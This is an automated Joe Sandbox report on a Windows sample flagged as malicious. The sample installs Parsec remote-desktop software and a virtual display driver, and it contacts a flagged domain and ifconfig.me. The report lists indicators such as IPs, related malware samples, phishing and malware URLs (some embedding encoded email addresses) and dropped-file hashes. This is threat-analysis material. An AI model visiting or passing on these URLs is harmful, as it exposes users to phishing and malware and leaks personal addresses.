                      https://parsec.appURLUpdateInfohttps://parsec.app/changelogkernel32::Wow64EnableWow64FsRedirection(iparsec-vud.exe, 0000002D.00000002.2450362899.0000000000518000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://beautifullyuncluttered.com/uu8v4UUzTU.tmp, 00000002.00000002.2293815599.000000000374D000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000002.00000003.2286699133.0000000003720000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://support.parsec.appInstallLocationNoModifyNoRepairPublisherParsecparsec-windows.exe, 0000000D.00000003.2494039079.0000000000675000.00000004.00000020.00020000.00000000.sdmp, parsec-windows.exe, 0000000D.00000002.2494938332.0000000000675000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2450362899.0000000000518000.00000004.00000020.00020000.00000000.sdmp, parsec-vdd.exe, 00000041.00000002.2492098487.00000000005D1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      188.114.96.3
                      		beautifullyuncluttered.comEuropean Union
                      		13335CLOUDFLARENETUStrue
                      34.160.111.145
                      		ifconfig.meUnited States
                      		2686ATGS-MMD-ASUSfalse

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1555525
                      Start date and time:2024-11-14 02:57:13 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 11m 58s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:74
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:uu8v4UUzTU.exe
                      renamed because original name is a hash value
                      Original Sample Name:4c750c11a04f90c9922ace4a237dc256d7e71fa512d4857922cc7d46bb4ba0e9.exe
                      Detection:MAL
                      Classification:mal42.evad.winEXE@127/204@2/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 111
                      • Number of non-executed functions: 209
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                      • Excluded IPs from analysis (whitelisted): 192.229.221.95
                      • Excluded domains from analysis (whitelisted): crl.edge.digicert.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ocsps.ssl.com, builds.parsec.app, ocsp.edge.digicert.com, ctldl.windowsupdate.com, crl3.digicert.com, crl4.digicert.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      02:58:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Parsec.App.0 C:\Program Files\Parsec\parsecd.exe app_silent=1
                      02:59:01AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Parsec.App.0 C:\Program Files\Parsec\parsecd.exe app_silent=1
                      20:58:17API Interceptor3x Sleep call for process: uu8v4UUzTU.tmp modified
                      20:58:51API Interceptor3x Sleep call for process: pservice.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      188.114.96.3Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                      • www.rtpwslot888gol.sbs/7arg/
                      Yeni sipari#U015f _TR-59647-WJO-001.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      • paste.ee/d/lmTya
                      View Pdf Doc_1c854e0875fca437af9ba7046d2f6712.htmGet hashmaliciousUnknownBrowse
                      • zy8wq.nhgrt.top/DydymQ/31zY8wQ31?&&r4n=Z2FicmllbGUuY29uZ2Vkb0BnZi5jb20%3D
                      View Pdf Doc_8a3c334133bfb9605fc344b2f764ac62.htmGet hashmaliciousUnknownBrowse
                      • 4je3f.nhgrt.top/V0afhB/154jE3f15?&&wVd=dGFoZXIubWFuc29vckB5YXNtYXJpbmEuYWU%3D
                      8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                      • lysyvan.com/login.php
                      7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                      • qegyhig.com/login.php
                      UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                      • qegyhig.com/login.php
                      1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                      • lysyvan.com/login.php
                      arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                      • qegyhig.com/login.php
                      Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                      • qegyhig.com/login.php
                      34.160.111.145Creal.exeGet hashmaliciousCreal StealerBrowse
                      • ifconfig.me/
                      #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeGet hashmaliciousBlank Grabber, Creal StealerBrowse
                      • ifconfig.me/
                      SecuriteInfo.com.Variant.Fragtor.599953.20231.7803.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                      • myexternalip.com/raw
                      mek_n_bat.batGet hashmaliciousUnknownBrowse
                      • ifconfig.me/ip
                      dtyb0ut8vVGet hashmaliciousUnknownBrowse
                      • ifconfig.me/
                      file.exeGet hashmaliciousUnknownBrowse
                      • /
                      file.exeGet hashmaliciousUnknownBrowse
                      • /
                      L9ck4BoFjc.ps1Get hashmaliciousUnknownBrowse
                      • ifconfig.me/
                      a3d1ef821849f015365076467994986ebf47905ffcc4f16761d222e1155abd10ba229aa11e70694c70523e9cbfd0eba5.dllGet hashmaliciousUnknownBrowse
                      • ifconfig.me/ip
                      a3d1ef821849f015365076467994986ebf47905ffcc4f16761d222e1155abd10ba229aa11e70694c70523e9cbfd0eba5.dllGet hashmaliciousUnknownBrowse
                      • ifconfig.me/ip

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      ifconfig.meCreal.exeGet hashmaliciousCreal StealerBrowse
                      • 34.160.111.145
                      #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeGet hashmaliciousBlank Grabber, Creal StealerBrowse
                      • 34.160.111.145
                      mek_n_bat.batGet hashmaliciousUnknownBrowse
                      • 34.160.111.145
                      6Ek4nfs2y1.exeGet hashmaliciousPhoenixKeylogger, PureLog StealerBrowse
                      • 34.117.118.44
                      uJ5c4dQ44E.exeGet hashmaliciousUnknownBrowse
                      • 34.117.118.44
                      uJ5c4dQ44E.exeGet hashmaliciousUnknownBrowse
                      • 34.117.118.44
                      SecuriteInfo.com.Trojan.MulDrop26.50476.18658.7474.exeGet hashmaliciousUnknownBrowse
                      • 34.117.118.44
                      SecuriteInfo.com.Trojan.MulDrop26.50476.18658.7474.exeGet hashmaliciousUnknownBrowse
                      • 34.117.118.44
                      Jv7Z27rOoW.exeGet hashmaliciousUnknownBrowse
                      • 34.117.118.44
                      Jv7Z27rOoW.exeGet hashmaliciousUnknownBrowse
                      • 34.117.118.44
                      fp2e7a.wpc.phicdn.nethttps://us.services.docusign.net/webforms-ux/v1.0/forms/de9dbdc77cc2367bb50c45c4d2a0b8c4Get hashmaliciousUnknownBrowse
                      • 192.229.221.95
                      http://subjectsfaintly.comGet hashmaliciousUnknownBrowse
                      • 192.229.221.95
                      https://buycode.us/Get hashmaliciousUnknownBrowse
                      • 192.229.221.95
                      http://badbutperfect.comGet hashmaliciousUnknownBrowse
                      • 192.229.221.95
                      http://u48113141.ct.sendgrid.net/Get hashmaliciousUnknownBrowse
                      • 192.229.221.95
                      https://vivantskincare.taplink.wsGet hashmaliciousHTMLPhisherBrowse
                      • 192.229.221.95
                      http://percentagesubsequentprosper.comGet hashmaliciousUnknownBrowse
                      • 192.229.221.95
                      https://usps.com-qaze.xyz/lGet hashmaliciousUnknownBrowse
                      • 192.229.221.95
                      https://u47618913.ct.sendgrid.net/ls/click?upn=u001.ySazWJ5NZMDRHbOtEU-2BeoVq5CHimfeKOmAStZ-2FBgQMYQ3SSwsETAhk1yN-2BT4-2Bp2oKYzZov6D-2F-2FVWJZ1NqqUA8rkCQTGD9qAyzE3VfFeoQ2nuSJqqyEFkZOdD2fHyfAGMqPTrK5an3w0r3jeoJ-2B5P7rAm7lpee2LRBP-2FVZ8vpCC6OhMnZUP9C90hQTb0-2BpgFS16pphNEcXB1XFdv8oIx-2FwRORRrbhR98R4uG9rtcNDDwGDlWsc4rC8kZPQKm-2F1Mm8tNwYXTNsqE7C9scBPWKFj8-2Flkc4ljwpAg27SdTSH4Lv1yIeDUc-2Br14vSnR5hortDhaaXBKI0vawIBQmkU8qdJOSHyv8egzfUQvo0FmhKgqV1moo-2BnRe99IbJ35dDYZE0MrccJKFnB5BMI9ztOOsnQMWDWj4usmLc-2BeVbqm24LsVBI18WzbkH2NLJelVG2ts-2FY8NEmgO2IHd2ydt-2BhAOvQWuc-2BoCn3Ao-2FeTWrPbny4XNYysHB9Qu5AO8kwT-2BngJOg10GMOXJS1JsoXicgqZmKM-2B-2FBOfXRHNWtl98FVLgmqGL1yDRbHi-2BrUHFtCwtB3BRDatptZmQIPNmSCXkxadq8IAoDDcDLc8BntBCtxPjmUSXgMaBFfsbPygwonXOkWZIQIxp1wvHXj-2BZ1eIGRPTwfugS5VMB7jYi-2FePeZ2P8ejmUXu0aUYor7jxsavDdhhTlU0d3WGd7xXyc70gSNl4s0N8kb-2FhMFZ3OuPfAMZG-2BGWl7Vsgw97GpKKLJX78rYX8Dtq0-2BFHI8oijeDXiQEnvU-2FI4F3F63PGiFfTUlwdYZGBzmjvsDN3AL1dSwty6HpxvSAKCtZ9VWrfa8NwcaFPKhxnxW4r2AR9TTWpNatEfU14LjPxEM-2F6jXkw8omQsSQ5ERlG1h6ZTouS0rz5yiYIeyCUVpUuOT4FtnK35YgC-2B0S-2FAum0FNVEv9aFTVDigH5szZA6pWOYsjwY5forGtNE55v7VxXGbkIRiEOYPWjYX7vj5EKbcmwdWMu8O3989atXdomEpBZG0cX1ylWoweLRVGVMNbSs-2FOqs-2B2xH8pdGj9VcybpSShtsD0ZIyshNyN0TwKGcJvKUNgMPDQVU64V5WleuedIajiM6uCp0xLc8RFYl0z-2B6RGF9NRTuzleNM-2Fg7hwq-2BEg52eVJjsFh3FdZjf0sr4TFySEDrqq3wci8zEr-2FI5c5Wj-2Fk-2F98bI-2FtCrFbLhfO78CKXQ3KYT53otrRT47GTmw-3D-3DwgKy_cipWnXOVDIhOM-2BBXOyzcHeOgQULBtPxx5riDWemF2G-2BwYzp7goEAXusjqSQprai9ZAQSor3gqS04DnqVBNX-2B27UevOScScKFnEaHJjzQ16GEAAakNELZybevGcJfbhSMyz-2FBkUhDktUr20hzj2tsCmKBBmBXnfL9SKUCvI82Axz3RMcAfJhD5XZvwDkb1SgvyUaaM4lOGnGhDtzRF5NN8-2FlqjhJjS-2FU6ncYoAfO4VYI-3DGet hashmaliciousHTMLPhisherBrowse
                      • 192.229.221.95
                      http://rdsdelivery.comGet hashmaliciousUnknownBrowse
                      • 192.229.221.95

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      ATGS-MMD-ASUSbotnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                      • 51.63.0.97
                      botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                      • 32.201.52.7
                      botnet.spc.elfGet hashmaliciousMirai, MoobotBrowse
                      • 57.185.6.240
                      https://us.services.docusign.net/webforms-ux/v1.0/forms/de9dbdc77cc2367bb50c45c4d2a0b8c4Get hashmaliciousUnknownBrowse
                      • 34.49.241.189
                      https://deltacapitalgroup.us11.list-manage.com/track/click?u=bf383f7aa25923d377aaa8ae2&id=d3424d590b&e=95f75804b2Get hashmaliciousUnknownBrowse
                      • 34.174.242.185
                      https://trckacbm.com/url/ver/714099389/2931216/e7443d1a99daced93ca033af62f22f12Get hashmaliciousUnknownBrowse
                      • 57.128.74.65
                      Pmendon.ext_Reord_Adjustment.docxGet hashmaliciousCaptcha PhishBrowse
                      • 34.168.114.70
                      botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                      • 48.123.197.206
                      aba5298f.msiGet hashmaliciousUnknownBrowse
                      • 34.49.241.189
                      https://wetransfer.com/downloads/dfae2da4024c0a427ba385707deb5ffa20240620022822/9659fcGet hashmaliciousUnknownBrowse
                      • 34.149.135.19
                      CLOUDFLARENETUSICBM.exeGet hashmaliciousXmrigBrowse
                      • 104.26.8.242
                      PO NO170300999.exeGet hashmaliciousMassLogger RATBrowse
                      • 188.114.96.3
                      http://bit.ly/UCEMPLGet hashmaliciousUnknownBrowse
                      • 1.1.1.1
                      https://us.services.docusign.net/webforms-ux/v1.0/forms/de9dbdc77cc2367bb50c45c4d2a0b8c4Get hashmaliciousUnknownBrowse
                      • 104.18.86.42
                      Hess-INV87796-9_588115125.docGet hashmaliciousUnknownBrowse
                      • 104.26.9.44
                      Hess-INV87796-9_588115125.docGet hashmaliciousUnknownBrowse
                      • 172.67.69.226
                      https://buycode.us/Get hashmaliciousUnknownBrowse
                      • 104.22.44.142
                      https://vivantskincare.taplink.wsGet hashmaliciousHTMLPhisherBrowse
                      • 104.17.25.14
                      sbafla - John Bradley your alert(s) workspace - to review - 11132024.msgGet hashmaliciousUnknownBrowse
                      • 188.114.97.3
                      Demande de proposition du Complexes Sportifs Terrebonne.pdfGet hashmaliciousUnknownBrowse
                      • 188.114.96.3

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      a0e9f5d64349fb13191bc781f81f42e1c39-EmprisaMaldoc.rtfGet hashmaliciousUnknownBrowse
                      • 188.114.96.3
                      • 34.160.111.145
                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                      • 188.114.96.3
                      • 34.160.111.145
                      file.exeGet hashmaliciousLummaCBrowse
                      • 188.114.96.3
                      • 34.160.111.145
                      file.exeGet hashmaliciousLummaCBrowse
                      • 188.114.96.3
                      • 34.160.111.145
                      file.exeGet hashmaliciousLummaCBrowse
                      • 188.114.96.3
                      • 34.160.111.145
                      medk.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                      • 188.114.96.3
                      • 34.160.111.145
                      tab.dll.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                      • 188.114.96.3
                      • 34.160.111.145
                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                      • 188.114.96.3
                      • 34.160.111.145
                      file.exeGet hashmaliciousLummaCBrowse
                      • 188.114.96.3
                      • 34.160.111.145
                      file.exeGet hashmaliciousLummaCBrowse
                      • 188.114.96.3
                      • 34.160.111.145

                      Dropped Files

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Program Files\Parsec Virtual Display Driver\uninstall.exehttps://viture.com/windowsGet hashmaliciousUnknownBrowse
                        C:\Program Files\Parsec Virtual Display Driver\nefconw.exehttps://viture.com/windowsGet hashmaliciousUnknownBrowse
                          C:\Program Files\Parsec Virtual Display Driver\driver\mm.dllhttps://viture.com/windowsGet hashmaliciousUnknownBrowse

                            Created / dropped Files

                            C:\Program Files\Parsec Virtual Display Driver\driver\mm.cat

                            Download File
                            Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):11928
                            Entropy (8bit):7.349994571032463
                            Encrypted:false
                            SSDEEP:192:27bR3HCkJC9aJ9EwvZvhYC3kn5NQlO8X01k9z3AwkqY:aRJZvh3Un5KlO8R9zJkqY
                            MD5:1FE1FC7CC73FB17E995D65835D51CA94
                            SHA1:249ACF0A3A362B2163127BD76F6D4D6AA463297D
                            SHA-256:136E64AC07DCE5A3B4935D5A9C5CFE03983C0B3065F46A30A45536D5B1681D5C
                            SHA-512:31FE1BDCB5F243A6EECC40006FC70793BC5AEA9D95FFE449117CB67366F0F120C393716FFE93B65A73C8B2DFE02917F1D0DCF4CA62AA302FE685513B8CC80BDC
                            Malicious:false
                            Preview:0.....*.H..........0......1.0...`.H.e......0..Y..+.....7.....J0..F0...+.....7........"*.J. %.#..h..240125162720Z0...+.....7.....0..$0... ...[.....@... 0S.m.r3.~...{..T1..0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...d.l.l...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ...[.....@... 0S.m.r3.~...{..T0... 4..\.Wv1.~3...&..,....8.a".....1..0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...i.n.f...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... 4..\.Wv1.~3...&..,....8.a".....0.....".&.H.....u.3.SGZ.1z0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...d.l.l...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0.....zU.fA.1........U?.1z0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...i.n.f...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0.......0...0....+.....7......0.....S.u.b.m.i.s.s.i.o.n. .I.D......

                            C:\Program Files\Parsec Virtual Display Driver\driver\mm.dll

                            Download File
                            Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):173736
                            Entropy (8bit):6.232270251717221
                            Encrypted:false
                            SSDEEP:3072:3zx0G2cnU93aR9bN9m3KUrru7qqybewIvUZdRfCzzr/:3zS9w9m3KUHAVvUZWXz
                            MD5:F09967CC8CC9BF03612DDECB6BF86DAA
                            SHA1:166F8E3000B6A1E2B13B46E85B7559B9837B9AA7
                            SHA-256:96DB6AE2F950B56E52BE3E68F92893AFA94645EAE09FEA2ABD5DD1985758150A
                            SHA-512:190D2EDEA81C42A2D7A5BC69CB98F03368E702A5FCB3FC1DCD4E9C387687BAB542E4B0E5DE67292E8B8A7EFED7FD9E30D1EFDD35BCDFEA28417DE71DB0E13864
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Joe Sandbox View:
                            • Filename: , Detection: malicious, Browse
                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........._...1T..1T..1T..1T..1T.F4U..1T.F5U..1T.F2U..1T..4U..1T..T..1T..0U..1T..0T..1T..6U..1T..2U..1T..5U..1T.F4U..1T.F1U..1T.F.T..1T..T..1T.F3U..1TRich..1T................PE..d......e.........." ...&.............................................................{....`A........................................ E..L...lE.......................~...(......`...p-..8...........................0,..@............................................text....'.......(.................. ..`PAGE.........@.......,.............. ..`.rdata...O.......P..................@..@.data...."...P......................@....pdata...............H..............@..@_RDATA...............\..............@..@.rsrc................`..............@..@.reloc..`............z..............@..B........................................................................................................................

                            C:\Program Files\Parsec Virtual Display Driver\driver\mm.inf

                            Download File
                            Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):4122
                            Entropy (8bit):3.7080252993527285
                            Encrypted:false
                            SSDEEP:48:MoXx6bEEAkWfd6QxVO2X2iI+xCPOgbqGSW8nijzXk0m0hX:K4zDI+xCP1SW8niXX
                            MD5:D8030AFE09A2F984BE00389B31F7039B
                            SHA1:AB7A55FA6641CC31B0B7E70C8680BBBD553FC8A1
                            SHA-256:34DA9FF45C13577631F67E33D11B8A26E3D22CA685D00C388B6122A795800588
                            SHA-512:0787E9E95369686B20BCBDDB9FF984111C4ED53A064FC8F198691DB5C124DFBE1B1F4D434DBFD81482545B723C01325ED9BCC626F461191B3AE4095222DF10A6
                            Malicious:false
                            Preview:..;.....;. .m.m...i.n.f.....;.........[.V.e.r.s.i.o.n.].....S.i.g.n.a.t.u.r.e. .=. .".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s. .=. .D.i.s.p.l.a.y.....C.l.a.s.s.G.u.i.d. .=. .{.4.D.3.6.E.9.6.8.-.E.3.2.5.-.1.1.C.E.-.B.F.C.1.-.0.8.0.0.2.B.E.1.0.3.1.8.}.....C.l.a.s.s.V.e.r. .=. .2...0.....P.r.o.v.i.d.e.r. .=. .%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%.....C.a.t.a.l.o.g.F.i.l.e. .=. .m.m...c.a.t.....D.r.i.v.e.r.V.e.r. .=. .0.1./.2.5./.2.0.2.4.,.0...4.5...0...0.....P.n.p.L.o.c.k.d.o.w.n. .=. .1.........[.M.a.n.u.f.a.c.t.u.r.e.r.].....%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%. .=. .S.t.a.n.d.a.r.d.,.N.T.a.m.d.6.4.........[.S.t.a.n.d.a.r.d...N.T.a.m.d.6.4.].....%.D.e.v.i.c.e.N.a.m.e.%. .=. .P.a.r.s.e.c.V.D.A.D.e.v.i.c.e._.I.n.s.t.a.l.l.,. .R.o.o.t.\.P.a.r.s.e.c.\.V.D.A.........[.S.o.u.r.c.e.D.i.s.k.s.F.i.l.e.s.].....m.m...d.l.l. .=. .1.........[.S.o.u.r.c.e.D.i.s.k.s.N.a.m.e.s.].....1. .=. .%.D.i.s.k.N.a.m.e.%.........;. .=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=. .U.M.D.F. .D.e.v.i.c.e. .=.=.=.=.=.=.=.=.=.=.

                            C:\Program Files\Parsec Virtual Display Driver\mm.man

                            Download File
                            Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                            File Type:XML 1.0 document, ASCII text, with very long lines (331)
                            Category:dropped
                            Size (bytes):6536
                            Entropy (8bit):4.9696208551586025
                            Encrypted:false
                            SSDEEP:96:tK5BbfK9K3H5KSHtMLutn1LuK9xFTxRo0JpAfKOuKtetnJnwgYDxRUmqU21+WJp:ARfK9K9pnJnw1qm/21+WJp
                            MD5:481369808B1B657547BCD92A897C58C0
                            SHA1:847723989CF3C9C98B64549090E8260C922D9201
                            SHA-256:E6A9944CA554B25D67B47B4D0DFBADA6EA5AE7CB208B9EC09CFE6132BAB4600F
                            SHA-512:42E6E7332DC0A6B14B308A4F04F1AFDFCF950C6FCAA6609DD1730BD0A7AA6D764F56BE05A45E94877B6D4028E0A312029BAA7FA67F49D280F05A6FFE069D9E77
                            Malicious:false
                            Preview:<?xml version='1.0' encoding='utf-8' standalone='yes'?>.<instrumentationManifest xmlns="http://schemas.microsoft.com/win/2004/08/events" xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://schemas.microsoft.com/win/2004/08/events eventman.xsd">. <instrumentation>. <events>. <provider guid="{e0dde897-547a-4ab3-afa1-8ab6490f3563}" messageFileName="%WinDir%\System32\drivers\UMDF\mm.dll" name="Parsec Virtual Display Driver" resourceFileName="%WinDir%\System32\drivers\UMDF\mm.dll" symbol="DriverControlGuid">. <channels>. <importChannel chid="SYSTEM" name="System"/>. </channels>. <templates>. <template tid="tid_load_template">. <data inType="win:Pointer" name="DeviceObjPtr" outType="win:HexInt64"/>. <data inType="win:UInt32" name="Status" outType="win:NTSTATUS"/>. </templat

                            C:\Program Files\Parsec Virtual Display Driver\nefconw.exe

                            Download File
                            Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):588160
                            Entropy (8bit):6.412426868092969
                            Encrypted:false
                            SSDEEP:12288:o27GX/DYwTLMcdMcYsWpP86/6L94gsleElgEo0JFoG:o27GX/DYwTLMcdMcYtF8S6L94gslbOED
                            MD5:E9F2BC8C82AC755F47C7F89D1530F1A1
                            SHA1:7CE5938C4B8A3EB4DE49F7A7E34972F5F2ACFCB5
                            SHA-256:CF746D1B0BBB713993D4A90DCCD774C78D9FFF8C2BA5A054B6C8F56C77E1EEE1
                            SHA-512:86ED0A391D22631DA9BDC7EB9CB096BA4DE4C6619C6C4326030CB03D196B63E5AA156BAC264A48D5B4CDA7401844A3B5050259B41859D32E0C4D39B96913C2CE
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Joe Sandbox View:
                            • Filename: , Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}B..9#f.9#f.9#f.r[e.3#f.r[c.#f.r[b.*#f.kVb.(#f.kVe.3#f.kVc.k#f..Vc.:#f.r[g.6#f.9#g.#f..Vo.=#f..V..8#f.9#..8#f..Vd.8#f.Rich9#f.................PE..d......d.........."......@...........f.........@.............................@......}.....`.............................................................x....p...I.......)... .......v..8....................x..(....v..8............P..8............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data....?...0...&... ..............@....pdata...I...p...J...F..............@..@.detourc.!......."..................@..@.detourd............................@..._RDATA..............................@..@.rsrc...x...........................@..@.reloc....... ......................@..B........................................................................................................

                            C:\Program Files\Parsec Virtual Display Driver\uninstall.exe

                            Download File
                            Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Category:dropped
                            Size (bytes):87168
                            Entropy (8bit):7.1566162661131685
                            Encrypted:false
                            SSDEEP:1536:l/T2X/jN2vxZz0DTHUpouvUpdbIMQZEB6d0I7w9xj:lbG7N2kDTHUpouvUpdbkZEEdBMX
                            MD5:A8482B15BD93524520814369536FECFA
                            SHA1:62242CEBCE6E5BB7737127B3D00A66F458A64391
                            SHA-256:1E30A0C0FB30C1B09007ABE48909FE05EFB055DBC0A917F4F29D37635319F243
                            SHA-512:B01FCC9F7CB1F7351062B85D6632CE60C80F8543074A8E95A5CF93C85A76D7CF5F870EC9FDCCC3E2ED959B914D315B34FF3307C8D3B469956925F8FFDC61FDF0
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Joe Sandbox View:
                            • Filename: , Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................=.....@..........................................................+...)...........................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata.......`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                            C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat

                            Download File
                            Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                            File Type:DOS batch file, ASCII text
                            Category:dropped
                            Size (bytes):420
                            Entropy (8bit):5.190650906040986
                            Encrypted:false
                            SSDEEP:12:35CmSrNUiI+ss0z6qfr+iIq99Bz6qFLs91rdajREWV:3+rtIXHzRrNIq99BzsbrcjV
                            MD5:EE1BFB5CCBB3949E3258155E141A68A5
                            SHA1:B79DD1E75E3E7ACD8D21D7B17C86673A6C6383D9
                            SHA-256:1E7C35EB6C296F96AEE5AE4BBBD40395E8019BDE95EF9BEF91260DD8EF03C6D1
                            SHA-512:B37D680F5DAB52536926C718EB1B4C1F0E78552C061756F998E3A3CCB2DC4FBEA15DD1A4B181646A68A2987A22CE225C185C2EF2BB1D10A70C780ADA8CF9F9AA
                            Malicious:false
                            Preview:@echo off.@setlocal..set MYDIR=%~dp0.pushd "%MYDIR%"..start /wait .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318".start /wait .\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA.start /wait .\nefconw.exe --install-driver --inf-path ".\driver\mm.inf"..popd.endlocal.

                            C:\Program Files\Parsec Virtual Display Driver\vdduninstall.bat

                            Download File
                            Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                            File Type:DOS batch file, ASCII text
                            Category:dropped
                            Size (bytes):272
                            Entropy (8bit):5.213077826331079
                            Encrypted:false
                            SSDEEP:6:h1d4RPXKB1imilr6cuIUiItAns0NS/zCSm/1Iffr6c6Bux3jEkEWV:35CmSrNUiI+ss0z6qfrkajREWV
                            MD5:FBC8D5E19F89DFFCCD165F44ABF114B4
                            SHA1:A07501EA396A4E29654352CF8ED71C7819109E5D
                            SHA-256:8F503E40A32959D9D2EE5A9E2A3DA627F6ED158E6C87C47EF17F1E5D74F47B9A
                            SHA-512:08739F57B74EA457F505D416C5CC6C50539343EE33E80D76B95CA1A9B8760EAEF9E97712A5824D8C22A7287C819149A6B60E6A08511E292CAC71EF064AD168F6
                            Malicious:false
